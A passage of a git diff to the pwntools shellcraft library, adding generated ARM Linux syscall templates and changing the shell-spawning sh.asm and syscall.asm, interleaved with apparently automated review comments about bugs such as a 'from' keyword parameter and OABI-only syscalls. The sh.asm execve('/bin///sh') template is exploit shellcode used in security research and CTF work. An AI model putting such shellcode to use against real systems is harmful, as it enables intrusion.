@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setuid.asm b/pwnlib/shellcraft/templates/arm/linux/setuid.asm new file mode 100644 index 000000000..034e6511a --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sh.asm b/pwnlib/shellcraft/templates/arm/linux/sh.asm index 6b951322a..5da8106e1 100644 --- a/pwnlib/shellcraft/templates/arm/linux/sh.asm +++ b/pwnlib/shellcraft/templates/arm/linux/sh.asm @@ -1,7 +1,11 @@ -<%docstring>Execute /bin/sh +<% from pwnlib.shellcraft import arm %> +<%docstring> +Execute a different process. - adr r0, bin_sh - mov r2, #0 - mov r1, r2 - svc SYS_execve - bin_sh: .asciz "/bin/sh" + >>> p = run_assembly(shellcraft.arm.linux.sh()) + >>> p.sendline('echo Hello') + >>> p.recv() + 'Hello\n' + + + ${arm.linux.execve('/bin///sh', 0, 0)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sigaction.asm b/pwnlib/shellcraft/templates/arm/linux/sigaction.asm new file mode 100644 index 000000000..0d3608c00 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} 
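Review bot: The new docstring for sh.asm reads `Execute a different process.`, which does not describe what the template does; `${arm.linux.execve('/bin///sh', 0, 0)}` always execs `/bin/sh` with a NULL argv and envp, so say that: `Execute /bin/sh via execve with argv and envp set to NULL.` It would also help to note why the path is `/bin///sh` (padded so the string is a multiple of four bytes for the word-wise loads the execve helper presumably generates — confirm against arm.linux.execve), since a reader will otherwise assume a typo. The doctest's `p.recv()` returns whatever has arrived so far and may be shorter than `'Hello\n'` on a slow target; `p.recvline()` is the deterministic form.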
diff --git a/pwnlib/shellcraft/templates/arm/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/arm/linux/sigaltstack.asm new file mode 100644 index 000000000..6bc6f5838 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sigaltstack.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/arm/linux/signal.asm b/pwnlib/shellcraft/templates/arm/linux/signal.asm new file mode 100644 index 000000000..cf820f084 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sigpending.asm b/pwnlib/shellcraft/templates/arm/linux/sigpending.asm new file mode 100644 index 000000000..384b3dca4 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/arm/linux/sigprocmask.asm new file mode 100644 index 000000000..a3affc046 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sigprocmask.asm 
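Review bot: The signal template emits `${syscall('SYS_signal', sig, handler)}`, but as far as I recall the ARM syscall table has no signal entry at all (arch/arm unistd.h carries only the comment `48 was sys_signal`, and the EABI table has `sys_ni_syscall` in that slot), so `SYS_signal` will either fail to resolve when the shellcode is assembled or return ENOSYS at runtime. The generator appears to be walking a libc prototype list rather than the ARM syscall table; dropping entries that have no `__NR_*` on ARM, or pointing this one at `SYS_sigaction`, would avoid shipping a template that can never work. At minimum the docstring should warn that this syscall is not implemented on ARM.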
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="how, set, oset"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + + + ${syscall('SYS_sigprocmask', how, set, oset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sigreturn.asm b/pwnlib/shellcraft/templates/arm/linux/sigreturn.asm index aaccf63cd..57adce368 100644 --- a/pwnlib/shellcraft/templates/arm/linux/sigreturn.asm +++ b/pwnlib/shellcraft/templates/arm/linux/sigreturn.asm @@ -1,5 +1,8 @@ -<% from pwnlib.shellcraft.arm.linux import syscall %> +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%docstring> +Invokes the syscall sigreturn. See 'man 2 sigreturn' for more information. + - -<%docstring>Sigreturn system call - ${syscall('SYS_sigreturn', )} + ${syscall('SYS_sigreturn')} diff --git a/pwnlib/shellcraft/templates/arm/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/arm/linux/sigsuspend.asm new file mode 100644 index 000000000..21fc19afc --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/arm/linux/splice.asm b/pwnlib/shellcraft/templates/arm/linux/splice.asm new file mode 100644 index 000000000..a68c8b660 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/splice.asm 
@@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/stat.asm b/pwnlib/shellcraft/templates/arm/linux/stat.asm new file mode 100644 index 000000000..e12fd2e4b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/stat64.asm b/pwnlib/shellcraft/templates/arm/linux/stat64.asm new file mode 100644 index 000000000..e07e64980 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/stat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/stime.asm b/pwnlib/shellcraft/templates/arm/linux/stime.asm new file mode 100644 index 000000000..1813a6b45 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} 
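Review bot: The stime template's `${syscall('SYS_stime', when)}` targets a number that, as far as I recall, arch/arm unistd.h `#undef`s for EABI userspace (`__NR_stime` is in the OABI-only list alongside time, select and socketcall), so on an EABI kernel without OABI compat the generated shellcode gets ENOSYS. `settimeofday` is the EABI-available equivalent and already has its own template in this series. Either drop this template on ARM or add a docstring caveat such as `NOTE: stime is an OABI-only syscall on ARM; use settimeofday on EABI targets.`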
diff --git a/pwnlib/shellcraft/templates/arm/linux/stty.asm b/pwnlib/shellcraft/templates/arm/linux/stty.asm new file mode 100644 index 000000000..fc02b7d2c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/arm/linux/symlink.asm b/pwnlib/shellcraft/templates/arm/linux/symlink.asm new file mode 100644 index 000000000..ddc46414f --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} diff --git a/pwnlib/shellcraft/templates/arm/linux/symlinkat.asm b/pwnlib/shellcraft/templates/arm/linux/symlinkat.asm new file mode 100644 index 000000000..2ea59f0d5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sync.asm b/pwnlib/shellcraft/templates/arm/linux/sync.asm new file mode 100644 index 000000000..76d48cbc5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sync.asm 
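Review bot: The stty template emits `${syscall('SYS_stty', fd, params)}`, but as far as I recall the ARM kernel never implemented stty/gtty (arch/arm unistd.h only has the comment `31 was sys_stty`, and the table entry is `sys_ni_syscall`), so `SYS_stty` will either be missing from the ARM constants when the shellcode is assembled or return ENOSYS at runtime. The generator seems to be driven by libc prototypes rather than the ARM syscall table; filtering out names with no `__NR_*` on ARM would keep dead templates like this one out of the API. If it stays, the docstring should say plainly that the syscall is not implemented on ARM.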
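Review bot: `<%page args="from, to"/>` in symlink.asm uses the Python keyword `from` as a parameter name; as far as I can tell Mako compiles page args into a real Python `def` signature, so the template should raise a SyntaxError the first time `shellcraft.arm.linux.symlink` is rendered, and the `${syscall('SYS_symlink', from, to)}` expression has the same problem. Rename the parameter, e.g. `<%page args="from_, to"/>` and `${syscall('SYS_symlink', from_, to)}`, and update the `Arguments:` docstring to match. Since these files look generated, the generator should map Python keywords to a safe spelling rather than this one file being patched by hand.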
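Review bot: symlinkat.asm has the same keyword clash as symlink.asm: `<%page args="from, tofd, to"/>` and `${syscall('SYS_symlinkat', from, tofd, to)}` both use the reserved word `from` as an identifier, which as far as I can tell Mako turns into an invalid Python function signature, so the template cannot be rendered. Rename it to `<%page args="from_, tofd, to"/>` / `${syscall('SYS_symlinkat', from_, tofd, to)}` and adjust the `Arguments:` block.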
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/arm/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/arm/linux/sync_file_range.asm new file mode 100644 index 000000000..5ec0b1232 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/syscall.asm b/pwnlib/shellcraft/templates/arm/linux/syscall.asm index d21ca178d..9971f96d4 100644 --- a/pwnlib/shellcraft/templates/arm/linux/syscall.asm +++ b/pwnlib/shellcraft/templates/arm/linux/syscall.asm @@ -1,9 +1,8 @@ <% from pwnlib.shellcraft import arm - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context + from pwnlib.constants import eval + from pwnlib.abi import linux_arm_syscall as abi %> - - <%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4 = None, arg5 = None, arg6 = None"/> <%docstring> Args: [syscall_number, \*args] 
@@ -15,23 +14,17 @@ Example: >>> print shellcraft.arm.linux.syscall(11, 1, 'sp', 2, 0).rstrip() /* call syscall(11, 1, 'sp', 2, 0) */ - /* Set r0 = 1 = 0x1 */ - mov r0, #1 - mov r1, sp - /* Set r2 = 2 = 0x2 */ - mov r2, #2 - /* Set r3 = 0 = 0x0 */ - eor r3, r3 - /* Set r7 = 11 = 0xb */ - mov r7, #11 - swi #0 + mov r0, #1 + mov r1, sp + mov r2, #2 + eor r3, r3 /* 0 (#0) */ + mov r7, #0xb + svc 0 >>> print shellcraft.arm.linux.syscall('SYS_exit', 0).rstrip() /* call exit(0) */ - /* Set r0 = 0 = 0x0 */ - eor r0, r0 - /* Set r7 = (SYS_exit) = 0x1 */ - mov r7, #(SYS_exit) - swi #0 + eor r0, r0 /* 0 (#0) */ + mov r7, #(SYS_exit) /* 1 */ + svc 0 <% if isinstance(syscall, (str, unicode)) and syscall.startswith('SYS_'): @@ -52,11 +45,13 @@ Example: while args and args[-1] == '?': args.pop() syscall_repr = syscall_repr % ', '.join(args) + + registers = abi.register_arguments + arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5] + regctx = dict(zip(registers, arguments)) %>\ /* call ${syscall_repr} */ -% for dst, src in zip(['r0', 'r1', 'r2', 'r3', 'r4', 'r5', 'r6', 'r7'], [arg0, arg1, arg2, arg3, arg4, arg5, arg6, syscall]): - % if src != None: - ${arm.mov(dst, src)} - % endif -% endfor - swi #0 +%if any(arguments): + ${arm.setregs(regctx)} +%endif + svc 0 diff --git a/pwnlib/shellcraft/templates/arm/linux/syslog.asm b/pwnlib/shellcraft/templates/arm/linux/syslog.asm new file mode 100644 index 000000000..1b745a1ed --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/syslog.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/tee.asm b/pwnlib/shellcraft/templates/arm/linux/tee.asm new file mode 100644 index 000000000..895580911 --- /dev/null 
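Review bot: `arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5]` drops `arg6`, which the `<%page args=...>` signature in the first hunk still accepts, so a caller passing a seventh argument now has it silently ignored where the old loop moved it into r6; Linux ARM syscalls take at most six arguments in r0–r5, so the register is never needed, but the parameter should be removed from the signature or rejected rather than swallowed. The new `%if any(arguments):` guard is also wrong for a syscall number of integer 0 with no arguments (e.g. `syscall(0)`): `any([0, None, ...])` is false, `setregs` is skipped and `svc 0` runs with whatever r7 held; the intended test is presence, `%if any(a is not None for a in arguments):`. `regctx = dict(zip(registers, arguments))` relies on `abi.register_arguments` having exactly seven entries in the order `r7, r0..r5` and on `arm.setregs` ignoring `None` values; neither is visible here, so a comment stating both assumptions next to the zip would help the next reader.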
+++ b/pwnlib/shellcraft/templates/arm/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/time.asm b/pwnlib/shellcraft/templates/arm/linux/time.asm new file mode 100644 index 000000000..b6d060694 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/arm/linux/timer_create.asm b/pwnlib/shellcraft/templates/arm/linux/timer_create.asm new file mode 100644 index 000000000..c8b8e5321 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/timer_delete.asm b/pwnlib/shellcraft/templates/arm/linux/timer_delete.asm new file mode 100644 index 000000000..dc9dfe94b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/timer_delete.asm 
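Review bot: The time template's `${syscall('SYS_time', timer)}` uses a number that, as far as I recall, arch/arm unistd.h `#undef`s for EABI userspace (`__NR_time` is OABI-only, like stime and select), so on an EABI kernel without OABI compat the generated shellcode returns ENOSYS rather than the epoch time. `gettimeofday` or `clock_gettime` is what EABI glibc uses and both have templates in this series. Either omit this template on ARM or add a docstring caveat such as `NOTE: time is an OABI-only syscall on ARM; use gettimeofday on EABI targets.`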
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/arm/linux/timer_getoverrun.asm new file mode 100644 index 000000000..4a33c47b6 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/arm/linux/timer_gettime.asm new file mode 100644 index 000000000..a9f065766 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/arm/linux/timer_settime.asm b/pwnlib/shellcraft/templates/arm/linux/timer_settime.asm new file mode 100644 index 000000000..1e11d868c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/timer_settime.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/arm/linux/truncate.asm b/pwnlib/shellcraft/templates/arm/linux/truncate.asm new file mode 100644 index 000000000..e36e1ef59 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/arm/linux/truncate64.asm b/pwnlib/shellcraft/templates/arm/linux/truncate64.asm new file mode 100644 index 000000000..6c9692011 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ulimit.asm b/pwnlib/shellcraft/templates/arm/linux/ulimit.asm new file mode 100644 index 000000000..2e6e807a9 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ulimit.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/umask.asm b/pwnlib/shellcraft/templates/arm/linux/umask.asm new file mode 100644 index 000000000..0e4489a64 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/arm/linux/uname.asm b/pwnlib/shellcraft/templates/arm/linux/uname.asm new file mode 100644 index 000000000..4164dcddf --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} diff --git a/pwnlib/shellcraft/templates/arm/linux/unlink.asm b/pwnlib/shellcraft/templates/arm/linux/unlink.asm new file mode 100644 index 000000000..243f385a7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/arm/linux/unlinkat.asm b/pwnlib/shellcraft/templates/arm/linux/unlinkat.asm new file mode 100644 index 000000000..6f2786581 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/unlinkat.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/arm/linux/unshare.asm b/pwnlib/shellcraft/templates/arm/linux/unshare.asm new file mode 100644 index 000000000..fe1f9f569 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ustat.asm b/pwnlib/shellcraft/templates/arm/linux/ustat.asm new file mode 100644 index 000000000..674437633 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ustat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/utime.asm b/pwnlib/shellcraft/templates/arm/linux/utime.asm new file mode 100644 index 000000000..733b74e66 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} 
diff --git a/pwnlib/shellcraft/templates/arm/linux/utimensat.asm b/pwnlib/shellcraft/templates/arm/linux/utimensat.asm new file mode 100644 index 000000000..54ce8198c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/utimes.asm b/pwnlib/shellcraft/templates/arm/linux/utimes.asm new file mode 100644 index 000000000..6311db7ea --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} diff --git a/pwnlib/shellcraft/templates/arm/linux/vfork.asm b/pwnlib/shellcraft/templates/arm/linux/vfork.asm new file mode 100644 index 000000000..03182ed35 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/arm/linux/vhangup.asm b/pwnlib/shellcraft/templates/arm/linux/vhangup.asm new file mode 100644 index 000000000..64aaf7481 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/vhangup.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/arm/linux/vmsplice.asm b/pwnlib/shellcraft/templates/arm/linux/vmsplice.asm new file mode 100644 index 000000000..6a5f0c967 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/wait4.asm b/pwnlib/shellcraft/templates/arm/linux/wait4.asm new file mode 100644 index 000000000..ac37dae67 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/wait4.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/arm/linux/waitid.asm b/pwnlib/shellcraft/templates/arm/linux/waitid.asm new file mode 100644 index 000000000..9eb880b23 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/waitid.asm 
